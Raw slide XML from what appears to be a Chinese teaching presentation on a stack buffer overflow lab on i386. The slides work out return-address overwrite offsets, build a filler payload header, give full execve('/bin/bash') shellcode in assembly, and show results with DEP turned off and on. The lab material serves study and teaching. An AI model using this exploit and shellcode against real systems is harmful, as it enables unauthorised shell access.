                <a:t>漏洞代码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75245" y="4129987"/>
            <a:ext cx="8804910" cy="1856423"/>
            <a:chOff x="7816" y="851"/>
            <a:chExt cx="9244" cy="1949"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="矩形 21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>
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>shellcode 代码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07718" y="5986410"/>
            <a:ext cx="8804910" cy="1856423"/>
            <a:chOff x="7816" y="851"/>
            <a:chExt cx="9244" cy="1949"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="矩形 25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7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04</a:t>
              </a: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>
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>实验结果</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/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655320" y="4406212"/>
            <a:ext cx="3424238" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FAFAFA"/>
            </a:solidFill>
            <a:prstDash val="sys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45" r="68034" b="32530"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3491812"/>
            <a:ext cx="5789295" cy="679608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9207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攻击准备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4295" y="1819910"/>
            <a:ext cx="7272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+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0"/>
              <a:t>得到关键栈缓冲区的覆写公式：</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1517015" y="2622550"/>
            <a:ext cx="6927850" cy="6249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%ecx - 0x4 = &amp;ret addr1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ret addr1 = input + 0x104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800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>其中：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>&amp;ret addr1 = %ebp + 0x4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/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%ebp = buf + 0x88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0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>0x104 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t> payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>头部长度</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0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endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0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800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>整理后得：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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%ecx = buf + 0x90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ret addr1 = input + 0x104</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>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0829290" y="2297430"/>
            <a:ext cx="547624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argc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addr0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 ...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 &lt;---- %ecx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addr1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 &lt;---- %esp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XXXXXXXX  | ----&gt; %ebp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+-------------+ &lt;---- %ebp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|    %ecx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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea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042986" y="1803111"/>
            <a:ext cx="0" cy="66825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526655" y="3491865"/>
            <a:ext cx="10524490" cy="1901825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9600" b="0" kern="1200" normalizeH="0" baseline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shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9600" b="0" kern="1200" normalizeH="0" baseline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代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" b="0" kern="1200" normalizeH="0" baseline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526" y="2496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  <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18000" i="1" dirty="0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200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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44295" y="1958340"/>
            <a:ext cx="14349730" cy="17703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2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>shellcode 代码包括 2 个部分：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0"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800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>头部的作用是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>实施缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>，主要包括覆写数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0"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800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>主体的作用是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>系统调用启动一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Cambria" panose="020405030504060302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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>头部</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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1558290"/>
            <a:ext cx="1280350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head0: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begin of buf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.rept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0x84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.endr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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[%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%ecx - 0x4 = &amp;ret addr = %ebp + 0x4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0xffffffff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%ebp = anything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addr1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ret addr1 = input + 0x104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0x00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073140" y="4828540"/>
            <a:ext cx="901700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[ret addr1] |    |  ret addr1 =/= ret addr0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   \-------\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0xffffffff |      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%ebp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[%ecx]    | -----------/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0xff...0xff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buf = %esp - 0x88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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>头部</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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1558290"/>
            <a:ext cx="1280350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head0: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begin of buf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.rept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0x84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.endr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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[%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%ecx - 0x4 = &amp;ret addr = %ebp + 0x4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0xffffffff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%ebp = anything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addr1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ret addr1 = input + 0x104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0x00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073140" y="4828540"/>
            <a:ext cx="901700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[ret addr1] |    |  ret addr1 =/= ret addr0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   \-------\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0xffffffff |      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%ebp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[%ecx]    | -----------/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0xff...0xff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buf = %esp - 0x88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930" y="1457325"/>
            <a:ext cx="4652645" cy="19392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73775" y="7425690"/>
            <a:ext cx="3065145" cy="137223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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>头部</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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1558290"/>
            <a:ext cx="1280350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head0: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begin of buf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.rept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0x84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.endr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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[%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%ecx - 0x4 = &amp;ret addr = %ebp + 0x4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0xffffffff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%ebp = anything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addr1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ret addr1 = input + 0x104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0x00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073140" y="4828540"/>
            <a:ext cx="901700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[ret addr1] |    |  ret addr1 =/= ret addr0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   \-------\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0xffffffff |      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%ebp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[%ecx]    | -----------/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0xff...0xff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buf = %esp - 0x88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6660" y="3293110"/>
            <a:ext cx="4686935" cy="47371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5840" y="6560185"/>
            <a:ext cx="3065145" cy="137223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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>头部</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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1558290"/>
            <a:ext cx="1280350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head0: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begin of buf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.rept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0x84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.endr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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[%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%ecx - 0x4 = &amp;ret addr = %ebp + 0x4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0xffffffff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%ebp = anything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addr1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ret addr1 = input + 0x104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0x00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073140" y="4828540"/>
            <a:ext cx="901700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[ret addr1] |    |  ret addr1 =/= ret addr0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   \-------\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0xffffffff |      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%ebp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[%ecx]    | -----------/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0xff...0xff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buf = %esp - 0x88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6660" y="3743325"/>
            <a:ext cx="4686935" cy="47371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5840" y="5709285"/>
            <a:ext cx="3065145" cy="137223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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>头部</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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1558290"/>
            <a:ext cx="1280350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head0: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begin of buf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.rept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0x84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.endr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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[%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%ecx - 0x4 = &amp;ret addr = %ebp + 0x4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0xffffffff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%ebp = anything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addr1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&lt;- ret addr1 = input + 0x104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.byte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0x00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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073140" y="4828540"/>
            <a:ext cx="901700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[ret addr1] |    |  ret addr1 =/= ret addr0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   \-------\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0xffffffff |         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%ebp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[%ecx]    | -----------/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0xff...0xff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+-------------+ &lt;---- buf = %esp - 0x88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6660" y="4143375"/>
            <a:ext cx="4686935" cy="47371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5840" y="4852035"/>
            <a:ext cx="3065145" cy="137223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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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8645" y="1261110"/>
            <a:ext cx="10205085" cy="7724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#include &lt;sys/syscall.h&gt;  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#define STRING	"/bin/bash\0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0">
              <a:solidFill>
                <a:srgbClr val="BC7A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BC7A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.org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0x104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main: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jmp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calladdr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popladdr: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arg0: syscall number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$SYS_execve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eax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arg1: pathname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popl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esi points to string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ebx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arg2: argv[]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argv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addl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ecx points to argv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set up argv[0] pointer to pathname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arg3: envp[]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envp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edx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addl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edx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edx points to envp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execve("/bin/bash", ["/bin/bash", NULL], [NULL])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$0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x80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calladdr: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call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popladdr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string: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.string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.align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4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argv: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envp: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endParaRPr lang="en-US" alt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645" y="1927225"/>
            <a:ext cx="1350645" cy="4502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158730" y="1927225"/>
            <a:ext cx="69786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强制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> 0x104 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>处开始</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="280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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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8645" y="1261110"/>
            <a:ext cx="9652000" cy="7724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#include &lt;sys/syscall.h&gt;  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#define STRING	"/bin/bash\0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0">
              <a:solidFill>
                <a:srgbClr val="BC7A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BC7A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.org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0x104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main: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jmp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calladdr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popladdr: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arg0: syscall number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$SYS_execve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eax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arg1: pathname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popl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esi points to string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ebx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arg2: argv[]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argv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addl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ecx points to argv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set up argv[0] pointer to pathname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arg3: envp[]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envp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edx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addl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edx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edx points to envp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execve("/bin/bash", ["/bin/bash", NULL], [NULL])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$0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x80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calladdr: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call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popladdr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string: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.string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.align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4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argv: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envp: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endParaRPr lang="en-US" alt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645" y="2238375"/>
            <a:ext cx="2954655" cy="62357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627235" y="1927225"/>
            <a:ext cx="8065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/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t> x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>函数调用的栈帧结构获取变量的绝对地址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588645" y="7075805"/>
            <a:ext cx="3520440" cy="215582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3355" y="3941445"/>
            <a:ext cx="2954655" cy="37528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10350" y="3957955"/>
            <a:ext cx="11950700" cy="1148080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9600" b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</a:rPr>
              <a:t>实验原理及平台介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" b="0" kern="1200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  <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18000" i="1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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C6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8645" y="1261110"/>
            <a:ext cx="10158095" cy="7724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#include &lt;sys/syscall.h&gt;  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#define STRING	"/bin/bash\0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0">
              <a:solidFill>
                <a:srgbClr val="BC7A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BC7A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.org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0x104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main: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jmp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calladdr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popladdr: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arg0: syscall number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$SYS_execve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eax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arg1: pathname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popl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esi points to string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ebx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arg2: argv[]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argv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addl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ecx points to argv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set up argv[0] pointer to pathname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arg3: envp[]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envp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edx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addl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edx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edx points to envp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execve("/bin/bash", ["/bin/bash", NULL], [NULL])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$0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x80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calladdr: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call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popladdr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string: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.string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.align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4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argv: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envp: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endParaRPr lang="en-US" alt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46740" y="192722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/>
              <a:t>准备系统调用参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500505" y="3218815"/>
            <a:ext cx="8703945" cy="30092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4200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C63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8645" y="1261110"/>
            <a:ext cx="10158095" cy="7724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#include &lt;sys/syscall.h&gt;  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#define STRING	"/bin/bash\0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0">
              <a:solidFill>
                <a:srgbClr val="BC7A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BC7A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.org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0x104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main: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jmp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calladdr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popladdr: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arg0: syscall number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$SYS_execve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eax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arg1: pathname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popl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esi points to string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ebx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arg2: argv[]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argv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addl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ecx points to argv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ecx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set up argv[0] pointer to pathname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prepare arg3: envp[]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movl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$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envp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edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:srgbClr val="00702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addl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esi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%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edx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      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edx points to envp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# execve("/bin/bash", ["/bin/bash", NULL], [NULL])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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$0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x80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calladdr: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call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popladdr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string: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.string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STRING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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.align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4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argv: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endParaRPr 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solidFill>
                  <a:srgbClr val="06287E"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>envp:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0">
              <a:solidFill>
                <a:srgbClr val="06287E"/>
              </a:solidFill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16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.long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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16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0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" b="0">
              <a:solidFill>
                <a:srgbClr val="40A070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29965" y="1915795"/>
            <a:ext cx="1444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/>
              <a:t>发起参数为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              </a:rPr>
              <a:t>execve("/bin/bash", ["/bin/bash", NULL], [NULL]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800"/>
              <a:t>的一次系统调用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442720" y="6104890"/>
            <a:ext cx="5876290" cy="6311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419975" y="3649345"/>
            <a:ext cx="10328275" cy="1586230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zh-CN" sz="9600" b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</a:rPr>
              <a:t>实验结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="9600" b="0" kern="1200" normalizeH="0" baseline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526" y="2496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04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18000" i="1" dirty="0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关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C63"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture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520" y="1483995"/>
            <a:ext cx="16317595" cy="4098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76935" y="2941955"/>
            <a:ext cx="1373505" cy="6311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84885" y="5911215"/>
            <a:ext cx="16317595" cy="2651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zh-CN" sz="3200" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>通过上图得知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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buf = 0xffffcc80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r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input = 0xffffc480</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>，从而：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="0">
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="3200" b="0"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%ecx = buf + 0x88 + 0x4 + 0x4 = 0xffffcd10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/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b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>ret addr1 = input + 0x104 = 0xffffc584</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId7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关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C63"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture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885" y="1635760"/>
            <a:ext cx="16317595" cy="5927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216660" y="3600450"/>
            <a:ext cx="3047365" cy="6311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6660" y="4986020"/>
            <a:ext cx="3047365" cy="6311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2400300"/>
            <a:ext cx="16319500" cy="3652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2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关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C63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6660" y="4280535"/>
            <a:ext cx="8634730" cy="25146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6660" y="4828540"/>
            <a:ext cx="10516235" cy="6311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开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3C63"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture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660" y="1739900"/>
            <a:ext cx="15854680" cy="4384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216660" y="3033395"/>
            <a:ext cx="15780385" cy="2628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16660" y="4975860"/>
            <a:ext cx="9408160" cy="29718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0" name="Picture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660" y="5490845"/>
            <a:ext cx="12214225" cy="3434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216660" y="8011160"/>
            <a:ext cx="2389505" cy="37719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903220" y="5370830"/>
            <a:ext cx="6107430" cy="254952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45792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97685" y="1322705"/>
            <a:ext cx="14699615" cy="2304415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135000" tIns="70200" rIns="135000" bIns="70200" anchor="b" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="8100"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感谢观看</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="8100" b="0" kern="120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zh-CN" sz="4800" b="0" kern="1200" normalizeH="0" baseline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+mj-ea"/>
                <a:cs typeface="Bauhaus 93" panose="04030905020B02020C02" charset="0"/>
              </a:rPr>
              <a:t>Thank you for watching</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4800" b="0" kern="1200" normalizeH="0" baseline="0">
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:noFill/>
              <a:latin typeface="Bauhaus 93" panose="04030905020B02020C02" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Bauhaus 93" panose="04030905020B02020C02" charset="0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" y="210820"/>
            <a:ext cx="3601085" cy="7543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13803" y="3016250"/>
            <a:ext cx="8805227" cy="670560"/>
            <a:chOff x="1913" y="2193"/>
            <a:chExt cx="13866" cy="1056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1913" y="2572"/>
              <a:ext cx="13866" cy="677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917" y="2193"/>
              <a:ext cx="13862" cy="1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sz="3300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                </a:rPr>
                <a:t>实验平台：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                  <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                </a:rPr>
                <a:t>i386</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63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平台介绍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3803" y="4359910"/>
            <a:ext cx="8805227" cy="670560"/>
            <a:chOff x="1913" y="2193"/>
            <a:chExt cx="13866" cy="1056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1913" y="2572"/>
              <a:ext cx="13866" cy="677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15" name="文本框 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
